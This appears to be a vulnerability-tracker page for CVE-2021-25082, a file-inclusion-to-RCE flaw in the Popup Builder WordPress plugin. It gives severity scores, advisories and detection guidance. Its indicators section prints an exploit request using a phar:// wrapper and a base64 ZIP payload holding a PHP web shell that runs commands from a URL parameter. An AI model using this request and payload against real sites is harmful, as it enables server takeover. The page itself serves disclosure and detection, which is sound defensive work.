CVE-2021-25082
published 2022-02-21CVE-2021-25082: The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a…
PriorityP276high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.37%
91.6th percentile
The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to RCE vulnerability via wrappers such as PHAR
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sygnoos | popup_builder | < 4.0.7 | 4.0.7 |
Detection & IOCsextracted from sources · hover to see the quote
command/?sgpb_type=phar://wp-content/uploads/{{upload_year}}/{{upload_month}}/malicious.zip/&cmd=echo%20{{marker}}↗
bytes↗
UEsDBAoAAAAAAHINkVuOOgt7HwAAAB8AAAAJABwAUG9wdXAucGhwVVQJAAPHCkJpxwpCaXV4CwABBAAAAAAEAAAAADw/cGhwIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/PgpQSwECHgMKAAAAAAByDZFbjjoLex8AAAAfAAAACQAYAAAAAAABAAAApIEAAAAAUG9wdXAucGhwVVQFAAPHCkJpdXgLAAEEAAAAAAQAAAAAUEsFBgAAAAABAAEATwAAAGIAAAAAAA==
- →Look for GET requests to the WordPress root with the 'sgpb_type' parameter containing a 'phar://' wrapper, which is the exploitation vector for this LFI/RCE vulnerability. ↗
- →Monitor for authenticated file uploads of ZIP archives to /wp-admin/async-upload.php followed shortly by requests using the 'sgpb_type' parameter referencing the uploaded file path via phar:// wrapper. ↗
- →Detect the 'sgpb_type' parameter in HTTP requests containing path traversal or wrapper strings (e.g., 'phar://', 'php://') as indicators of exploitation attempts. ↗
- →Check for the cookie 'wordpress_logged_in' in conjunction with the above upload and exploitation requests, as the attack requires authenticated access. ↗
- ·Exploitation requires the attacker to be authenticated (subscriber-level or higher) to upload the malicious ZIP file via the WordPress media uploader before triggering the PHAR wrapper via sgpb_type. ↗
- ·The vulnerability can be escalated from LFI to RCE only when the attacker can upload a PHAR-compatible archive (e.g., ZIP) to the server, which is possible via the WordPress media upload functionality for authenticated users. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rgh6-hx6g-h7q7: The Popup Builder WordPress plugin before 4
ghsa_unreviewed·2022-02-22
CVE-2021-25082 [HIGH] CWE-22 GHSA-rgh6-hx6g-h7q7: The Popup Builder WordPress plugin before 4
The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to RCE vulnerability via wrappers such as PHAR
VulnCheck
sygnoos popup_builder Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2021·CVSS 8.8
CVE-2021-25082 [HIGH] sygnoos popup_builder Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
sygnoos popup_builder Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to RCE vulnerability via wrappers such as PHAR
Affected: sygnoos popup_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-builder/popup-builder-406-local-file-inclusion-and-phar-deserialization
No detection rules found.
Nuclei
WordPress Popup Builder < 4.0.7 - Remote Code Execution
nuclei·CVSS 8.8
CVE-2021-25082 [HIGH] WordPress Popup Builder < 4.0.7 - Remote Code Execution
WordPress Popup Builder < 4.0.7 - Remote Code Execution
Popup Builder WordPress plugin before 4.0.7 contains a local file inclusion caused by unsanitized 'sgpb_type' parameter in require statement, letting attackers include arbitrary local files or execute code via wrappers like PHAR, exploit requires attacker to control 'sgpb_type' parameter.
Template:
id: CVE-2021-25082
info:
name: WordPress Popup Builder < 4.0.7 - Remote Code Execution
author: 0x_Akoko
severity: critical
description: |
Popup Builder WordPress plugin before 4.0.7 contains a local file inclusion caused by unsanitized 'sgpb_type' parameter in require statement, letting attackers include arbitrary local files or execute code via wrappers like PHAR, exploit requires attacker to control 'sgpb_type' parameter.
impact: |
At
No writeups or analysis indexed.
2022-02-21
Published
Exploited in the wild